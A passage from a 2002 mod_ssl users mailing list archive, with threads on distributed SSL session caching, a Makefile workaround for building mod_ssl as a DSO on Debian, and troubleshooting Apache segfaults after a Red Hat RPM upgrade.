   will not need EAPI hooks for Apache 2.0, but other EAPI
   functions may be useful. It is not certain how this effort
   will fit into the work being done in Apache 2.0 on mod_tls
   and if we will end up with two SSL solutions like we have
   with Apache 1.3.

How far along is the mod_ssl port to Apache 2?
Has anyone hacked up a distributed session cache?
Would a dbm session cache over NFS work?
Did the old Apache-SSL ssl_gcache ever work as a DSC?
How did ssl_gcache deal with security/integrity of the cache?
Is this problem even worse: Does the client throw away
  it's current session key every time it gets a different
  session key from the web server?
I see that there is a great deal of work on distributed
  shared memory (mostly for parallel computing). Has anyone
  put one of these solutions under mm?

John
--
John Bly Milton IV   (512) w:493-2764, h:323-5622, m:750-1783
FundsXpress  john.milton@fxfn.com  Don't FLAME, inform!  O-  
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 20:10:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA24952; Sat, 13 Jul 2002 20:09:05 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA24941; Sat, 13 Jul 2002 20:08:28 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 991D04CE731; Sat, 13 Jul 2002 20:08:27 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4319C28B00; Sat, 13 Jul 2002 20:08:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cesam.gfk-palace.org id PAA15380; Sat, 13 Jul 2002 15:33:09 +0200 (MET DST)
Received: from mac.gfk-palace.org ([192.168.0.1])
	by cesam.gfk-palace.org (8.11.6/8.8.7) with ESMTP id g6DDX7l15568
	for ; Sat, 13 Jul 2002 09:33:07 -0400
Mime-Version: 1.0
Message-Id: 
Date: Sat, 13 Jul 2002 09:33:05 -0400
To: mod_ssl Users Mailing List 
From: Guillaume Filion 
Subject: Problems when compiling as DSO module (and workaround)
Content-Type: text/plain; charset="iso-8859-1" ; format="flowed"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA15410
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Guillaume Filion 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all,

I'm trying to compile mod_ssl-2.8.10-1.3.26 as a DSO (APXS) module on 
my Debian box, but I got two problems:
First, when doing make, I got:
mod_ssl.h:349:18: ndbm.h: No such file or directory
This is the same problem as described at 
http://www.mail-archive.com/modssl-users@modssl.org/msg13487.html

On my system ndbm.h is located in /usr/include/db1/, so I added 
-I/usr/include/db1/ in pkg.sslmod/Makefile.

It did compile and install well, but when I tried to start Apache, I got this:
ali:/www# bin/apachectl start
Syntax error on line 208 of /usr/local/apache/conf/httpd.conf:
Cannot load /usr/local/apache/libexec/libssl.so into server: 
/usr/local/apache/libexec/libssl.so: undefined symbol: dbm_firstkey
bin/apachectl start: httpd could not be started
This is the same problem as described at 
http://www.mail-archive.com/modssl-users@modssl.org/msg13505.html

Devon Bleak found a workaround to the problem in: 
http://www.mail-archive.com/modssl-users@modssl.org/msg10438.html

So, in short, here's what I did to make it work:
apt-get install libgdbmg1 libgdbmg1-dev
./configure --with-apxs=/www/bin/apxs
Make these substitutions in pkg.sslmod/Makefile :
6c6
< CFLAGS=-I$(INCDIR) -DLINUX=22 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT 
-I../lib/expat-lite
---
>  CFLAGS=-I$(INCDIR) -DLINUX=22 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT 
>-I../lib/expat-lite -I/usr/include/db1
11c11
< LIBS_SHLIB=
---
>  LIBS_SHLIB= -lgdbm
make
make install
Modify my Apache configuration to add this line plus the other mod_ssl stuff:
LoadModule ssl_module         libexec/libssl.so

When I build mod_ssl statically into Apache these problems do not not occur.

These problems seem to have been present for a long time (Devon 
Bleak's workaround dates from February) and do not seem to be really 
hard to solve, just a bit a configure bork bork and it would find the 
right headers and libs. This really would make my life easier. 8)

Also, when I make install, apxs doesn't seem to modify my 
configuration file like it does with other apxs modules, is this a 
wanted behavior?
ali:/home/gfk/making-webserver/mod_ssl-2.8.10-1.3.26# make install
make[1]: Entering directory 
`/home/gfk/making-webserver/mod_ssl-2.8.10-1.3.26/pkg.sslmod'
make[1]: Nothing to be done for `all'.
make[1]: Leaving directory 
`/home/gfk/making-webserver/mod_ssl-2.8.10-1.3.26/pkg.sslmod'
cp libssl.so /usr/local/apache/libexec/libssl.so
chmod 755 /usr/local/apache/libexec/libssl.so
ali:/home/gfk/making-webserver/mod_ssl-2.8.10-1.3.26#

Also, mod_ssl is a *great* tool, but I guess you allready know that! 8)

Regards,
GFK's
-- 
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Key and more: http://guillaume.filion.org/      (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 20:13:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA25142; Sat, 13 Jul 2002 20:12:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id UAA25082; Sat, 13 Jul 2002 20:11:10 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 374E81F27D; Sat, 13 Jul 2002 11:02:39 -0700 (PDT)
Date: Sat, 13 Jul 2002 11:02:38 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Distributed Session Cache
Message-ID: <20020713180238.GA6277@rawbyte.com>
References: <5519ADC88B72AA469DBF02CA51211CE8026EF559@fxapps3.mesas.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5519ADC88B72AA469DBF02CA51211CE8026EF559@fxapps3.mesas.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



> How far along is the mod_ssl port to Apache 2?

It is basically done, already bundled with Apache itself as a regular module

> Has anyone hacked up a distributed session cache?

The closest I know of is for Apache-SSL, which Ben Laurie mentioned at one
of the Apachecons:  http://anoncvs.aldigital.co.uk/splash/
based on http://spread.org

Some discussion on this:
http://marc.theaimsgroup.com/?l=apache-modssl&m=99055320101822&w=2

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 20:18:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA25518; Sat, 13 Jul 2002 20:17:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id UAA25498; Sat, 13 Jul 2002 20:16:51 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6DIC9Ie000856;
	Sat, 13 Jul 2002 14:12:09 -0400
Date: Sat, 13 Jul 2002 14:12:08 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: John Milton 
cc: "'modssl-users@modssl.org'" 
Subject: Re: Distributed Session Cache
In-Reply-To: <5519ADC88B72AA469DBF02CA51211CE8026EF559@fxapps3.mesas.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Fri, 12 Jul 2002, John Milton wrote:

> How far along is the mod_ssl port to Apache 2?

Done, for all intents and purposes.  AFAIK, the only big still-missing
functionality is the per-directory POST renegotiations.

> Has anyone hacked up a distributed session cache?

Not that I'm aware of.  But somebody out there might have one I suppose...
anybody?

> Would a dbm session cache over NFS work?

Hmmm... probably not.  For one thing, it would be slow.  For another,
files are typically not lockable over NFS.  With multiple writers I'd
think it would be pretty easy to corrupt the dbm.  But I'm not positive.
Try it and see what happens I guess.

> Did the old Apache-SSL ssl_gcache ever work as a DSC?
> How did ssl_gcache deal with security/integrity of the cache?

You'd probably have to ask the Apache-SSL guys on that one.

> Is this problem even worse: Does the client throw away
>   it's current session key every time it gets a different
>   session key from the web server?

It's supposed to, yes.

> I see that there is a great deal of work on distributed
>   shared memory (mostly for parallel computing). Has anyone
>   put one of these solutions under mm?

Don't think so.  And anyway, Apache 2.0's mod_ssl doesn't use mm.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 20:32:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA26015; Sat, 13 Jul 2002 20:31:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relais.videotron.ca id UAA26009; Sat, 13 Jul 2002 20:30:53 +0200 (MET DST)
Received: from toilet ([24.202.196.150]) by relais.videotron.ca
          (Videotron-Netscape Messaging Server v4.15 MTA-PRD5) with ESMTP
          id GZ7A3F00.PB4 for ; Sat, 13 Jul 2002
          14:30:51 -0400 
Received: from toilet
	([127.0.0.1] helo=localhost ident=geoff)
	by toilet with esmtp (Exim 3.35 #1 (Debian))
	id 17TRfP-0000GJ-00; Sat, 13 Jul 2002 14:30:51 -0400
Date: Sat, 13 Jul 2002 14:30:51 -0400 (EDT)
From: Geoff Thorpe 
X-X-Sender: geoff@toilet.localnet
To: modssl-users@modssl.org
Subject: Re: Distributed Session Cache
In-Reply-To: <20020713180238.GA6277@rawbyte.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 13 Jul 2002, Daniel Lopez wrote:

> > How far along is the mod_ssl port to Apache 2?
>
> It is basically done, already bundled with Apache itself as a regular module
>
> > Has anyone hacked up a distributed session cache?
>
> The closest I know of is for Apache-SSL, which Ben Laurie mentioned at one
> of the Apachecons:  http://anoncvs.aldigital.co.uk/splash/
> based on http://spread.org
>
> Some discussion on this:
> http://marc.theaimsgroup.com/?l=apache-modssl&m=99055320101822&w=2

before I get a wave of follow-ups as a result of this, let me save myself
some typing ...

The good news: the work was actually done, finished, and working nicely
(very fast and scales about two orders of magnitude higher than you'd be
able to scale the SSL crypto to match it :)

The bad news: the work was done in/for a company and is not at this stage
open source. I am in the process of seeing what could be done to change
that now that someone has jogged my memory, but I need to stress that this
will be someone else's decision, not mine.

Cheers,
Geoff


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 21:23:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA27883; Sat, 13 Jul 2002 21:22:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spock.ste-land.com id VAA27869; Sat, 13 Jul 2002 21:21:37 +0200 (MET DST)
Received: from ste-land.com (bgp381173bgs.plnfld01.nj.comcast.net [68.36.18.109])
	by spock.ste-land.com (8.11.6/8.11.6) with ESMTP id g6DJLYl31336
	for ; Sat, 13 Jul 2002 15:21:35 -0400
Message-ID: <3D307D99.50807@ste-land.com>
Date: Sat, 13 Jul 2002 15:20:57 -0400
From: "Shaun T. Erickson" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: URGENT: need mod_ssl rpm to work with RedHat's apache_1.3.22 rpm on RH6.2
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shaun T. Erickson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I upgraded a 6.2 Red Hat system, from apache 1.2.12 to 1.3.22, using 
their rpms. In the process, the ssl module disappeared, and I cannot 
find a new one.

Since the apache is installed from an rpm, there is no way for me to 
build the module from the mod_ssl-2.8.5-1.3.22.tar.gz source file I 
downloaded, as it wants to integrate itself into the apache source that 
doesn't exist.

Our e-business site is broken until I can fix this.

Can anyone tell me what I have to do to fix this?

Most gracious thanks in advance!

    -ste


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 21:41:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA28446; Sat, 13 Jul 2002 21:40:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from store-o-matic.com id VAA28420; Sat, 13 Jul 2002 21:39:36 +0200 (MET DST)
From: aesquivel@email.com
Received: from email.com (nat3.amnet.co.cr [196.40.3.43])
	(authenticated)
	by store-o-matic.com (8.11.5/8.11.5) with ESMTP id g6DJdYs20147
	for ; Sat, 13 Jul 2002 13:39:34 -0600
Message-ID: <3D308816.5010903@email.com>
Date: Sat, 13 Jul 2002 14:05:42 -0600
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.9) Gecko/20020408
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Directory based virtual host
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Filter-Version: 1.8 (marvin)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: aesquivel@email.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is it posible to setup the functionality of ServerPath whithout 
NamedVirtualHost,
what I want to do is to have a virtual secure host using a directory 
suffix eg:

secure.example.com    <- main server
secure.example.com/vhost1/
secure.example.com/vhost2/
secure.example.com/vhost3/

Any ideas?


Thanks.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 21:44:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA28583; Sat, 13 Jul 2002 21:43:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from store-o-matic.com id VAA28552; Sat, 13 Jul 2002 21:42:21 +0200 (MET DST)
From: aesquivel@email.com
Received: from pp (nat3.amnet.co.cr [196.40.3.43])
	by store-o-matic.com (8.11.5/8.11.5) with SMTP id g6DJf5s20228
	for modssl-users@modssl.org; Sat, 13 Jul 2002 13:41:29 -0600
Date: Sat, 13 Jul 2002 13:41:29 -0600
Message-Id: <200207131941.g6DJf5s20228@store-o-matic.com>
To: modssl-users@modssl.org
Subject: Directory based virtual host
X-Filter-Version: 1.8 (marvin)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: aesquivel@email.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is it posible to setup the functionality of ServerPath whithout NamedVirtualHost,
what I want to do is to have a virtual secure host using a directory suffix eg:

secure.example.com    <- main server
secure.example.com/vhost1/
secure.example.com/vhost2/
secure.example.com/vhost3/

Any ideas?


Thanks.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 21:58:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA29090; Sat, 13 Jul 2002 21:57:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spock.ste-land.com id VAA29077; Sat, 13 Jul 2002 21:57:04 +0200 (MET DST)
Received: from ste-land.com (bgp381173bgs.plnfld01.nj.comcast.net [68.36.18.109])
	by spock.ste-land.com (8.11.6/8.11.6) with ESMTP id g6DJv2l31508
	for ; Sat, 13 Jul 2002 15:57:02 -0400
Message-ID: <3D3085E9.7070600@ste-land.com>
Date: Sat, 13 Jul 2002 15:56:25 -0400
From: "Shaun T. Erickson" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: URGENT: need mod_ssl rpm to work with RedHat's apache_1.3.22 rpm on RH6.2
References: <3D307D99.50807@ste-land.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shaun T. Erickson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Shaun T. Erickson wrote:

> I upgraded a 6.2 Red Hat system, from apache 1.2.12 to 1.3.22, using 
> their rpms. In the process, the ssl module disappeared

I have investigated further and discovered it's actually a different 
problem.

when I installed red hat's 1.3.22 apache rpm, it does in fact include a 
libssl.so module, which does get loaded in the httpd.conf.ssl file on 
the system. (I was looking for mod_ssl.so).

The problem is that this causes all the httpd processes to seg fault, 
which they don't, if the module isn't loaded.

    -ste


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 22:22:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00181; Sat, 13 Jul 2002 22:21:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spock.ste-land.com id WAA00155; Sat, 13 Jul 2002 22:20:06 +0200 (MET DST)
Received: from ste-land.com (bgp381173bgs.plnfld01.nj.comcast.net [68.36.18.109])
	by spock.ste-land.com (8.11.6/8.11.6) with ESMTP id g6DKK4l31630
	for ; Sat, 13 Jul 2002 16:20:05 -0400
Message-ID: <3D308B51.1010808@ste-land.com>
Date: Sat, 13 Jul 2002 16:19:29 -0400
From: "Shaun T. Erickson" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: URGENT: need mod_ssl rpm to work with RedHat's apache_1.3.22 rpm on RH6.2
References: <3D307D99.50807@ste-land.com> <3D3085E9.7070600@ste-land.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shaun T. Erickson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Shaun T. Erickson wrote:

> I have investigated further and discovered it's actually a different 
> problem.
>
> when I installed red hat's 1.3.22 apache rpm, it does in fact include 
> a libssl.so module, which does get loaded in the httpd.conf.ssl file 
> on the system. (I was looking for mod_ssl.so).
>
> The problem is that this causes all the httpd processes to seg fault, 
> which they don't, if the module isn't loaded.

I should not that if I fall back to the apache 1.3.12 rpms, it all 'just 
works'.

I'm wondering if something in the httpd.conf.ssl file is causing it to 
barf. I have no idea where that file came from, to see if there is an 
updated version I should be migrating the ssl settings to ...

    -ste

>



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jul 13 22:36:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00634; Sat, 13 Jul 2002 22:35:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id WAA00624; Sat, 13 Jul 2002 22:34:39 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6DKTqvu000996;
	Sat, 13 Jul 2002 16:29:52 -0400
Date: Sat, 13 Jul 2002 16:29:52 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: "Shaun T. Erickson" 
cc: modssl-users@modssl.org
Subject: Re: URGENT: need mod_ssl rpm to work with RedHat's apache_1.3.22
 rpm on RH6.2
In-Reply-To: <3D3085E9.7070600@ste-land.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sat, 13 Jul 2002, Shaun T. Erickson wrote:

> The problem is that this causes all the httpd processes to seg fault,
> which they don't, if the module isn't loaded.

It would be helpful if you could tell us *where* it was segfaulting.
Please see http://httpd.apache.org/dev/debugging.html for information on
how to generate a backtrace for us.

Thanks,
--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 14 19:04:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA29274; Sun, 14 Jul 2002 19:03:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA29251; Sun, 14 Jul 2002 19:02:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A34BD4CE694; Sun, 14 Jul 2002 19:02:19 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 082D3285D1; Sun, 14 Jul 2002 17:47:31 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from echo.computel.nl id PAA20145; Sun, 14 Jul 2002 15:01:57 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by echo.computel.nl (Postfix) with SMTP id B98AA9DE3
	for ; Sun, 14 Jul 2002 15:01:55 +0200 (CEST)
Received: from balefire10ww (e122144.upc-e.chello.nl [213.93.122.144])
	by echo.computel.nl (Postfix) with ESMTP id 37EE29DE1
	for ; Sun, 14 Jul 2002 15:01:55 +0200 (CEST)
Message-ID: <008101c22b36$a1429980$64c8a8c0@balefire10ww>
From: "Sander Steffann" 
To: 
References: <3D307D99.50807@ste-land.com> <3D3085E9.7070600@ste-land.com>
Subject: Re: URGENT: need mod_ssl rpm to work with RedHat's apache_1.3.22 rpm on RH6.2
Date: Sun, 14 Jul 2002 15:01:54 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiVirus: www.nederland.net e-mail virus scanner 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Sander Steffann" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

> when I installed red hat's 1.3.22 apache rpm, it does in fact include a
> libssl.so module, which does get loaded in the httpd.conf.ssl file on
> the system. (I was looking for mod_ssl.so).

Are you sure?? I have the latest RPM from RedHat (apache-1.3.22-5.6) and it
does not contain any file which has 'ssl' in its name. Maybe you still have
an old version of libssl.so on your system. This could also explain the
crashes you see.

Good luck,
Sander.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 14 20:08:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA01810; Sun, 14 Jul 2002 20:07:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spock.ste-land.com id UAA01803; Sun, 14 Jul 2002 20:06:46 +0200 (MET DST)
Received: from ste-land.com (bgp381173bgs.plnfld01.nj.comcast.net [68.36.18.109])
	by spock.ste-land.com (8.11.6/8.11.6) with ESMTP id g6EI6dl08905
	for ; Sun, 14 Jul 2002 14:06:39 -0400
Message-ID: <3D31BD85.1070707@ste-land.com>
Date: Sun, 14 Jul 2002 14:05:57 -0400
From: "Shaun T. Erickson" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: URGENT: need mod_ssl rpm to work with RedHat's apache_1.3.22 rpm on RH6.2
References: <3D307D99.50807@ste-land.com> <3D3085E9.7070600@ste-land.com> <008101c22b36$a1429980$64c8a8c0@balefire10ww>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shaun T. Erickson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Sander Steffann wrote:

>>Shaun Erickson wrote:
>>
>>when I installed red hat's 1.3.22 apache rpm, it does in fact include a
>>libssl.so module, which does get loaded in the httpd.conf.ssl file on
>>the system. (I was looking for mod_ssl.so).
>>
>
>Are you sure?? I have the latest RPM from RedHat (apache-1.3.22-5.6) and it
>does not contain any file which has 'ssl' in its name. Maybe you still have
>an old version of libssl.so on your system. This could also explain the
>crashes you see.
>
Yes, that's exactly what I discovered later. The more I dug into the 
problem, the more I learned and understood.

To get my server working again, I downloaded the rpm for the older 
version I'd been running, from Red Hat, and re-installed that. 
Everything is fine again.

Now, I am learning how to build the server and extra modules from 
source, so that I: 1) learn how to do it, 2) have the latest releases to 
draw upon, instead of Red Hat's lagged-behind software, with back-ported 
patches, 3) know exactly how everything is built.

My client will get a nicely running server that meets his needs, and I 
will have learned quite a bit, which goes right to the bottom-line of my 
resume. :)

    -ste


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jul 14 20:25:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA02492; Sun, 14 Jul 2002 20:24:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from spock.ste-land.com id UAA02482; Sun, 14 Jul 2002 20:23:53 +0200 (MET DST)
Received: from ste-land.com (bgp381173bgs.plnfld01.nj.comcast.net [68.36.18.109])
	by spock.ste-land.com (8.11.6/8.11.6) with ESMTP id g6EINpl08966
	for ; Sun, 14 Jul 2002 14:23:52 -0400
Message-ID: <3D31C18E.70909@ste-land.com>
Date: Sun, 14 Jul 2002 14:23:10 -0400
From: "Shaun T. Erickson" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3
X-Accept-Language: en-us
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Success (Was: Re: URGENT: need mod_ssl rpm to work with RedHat's apache_1.3.22 rpm on RH6.2)
References: <3D307D99.50807@ste-land.com> <3D3085E9.7070600@ste-land.com> <008101c22b36$a1429980$64c8a8c0@balefire10ww> <3D31BD85.1070707@ste-land.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shaun T. Erickson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I wrote:

> Now, I am learning how to build the server and extra modules from 
> source, so that I: 1) learn how to do it, 2) have the latest releases 
> to draw upon, instead of Red Hat's lagged-behind software, with 
> back-ported patches, 3) know exactly how everything is built. 

And I have now, after a few hours of  hair pulling, succeeded in 
building an apache_1.3.26/mm-1.1.3/openssl-0.9.6d/mod_ssl-2.8.10-1.3.26 
server.

Now I have to learn how to add php-4.2.1 & mod_perl-1.27 to this mix.

This isn't easy, but a little bit of success sure starts to make it fun. :)

    -ste

>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
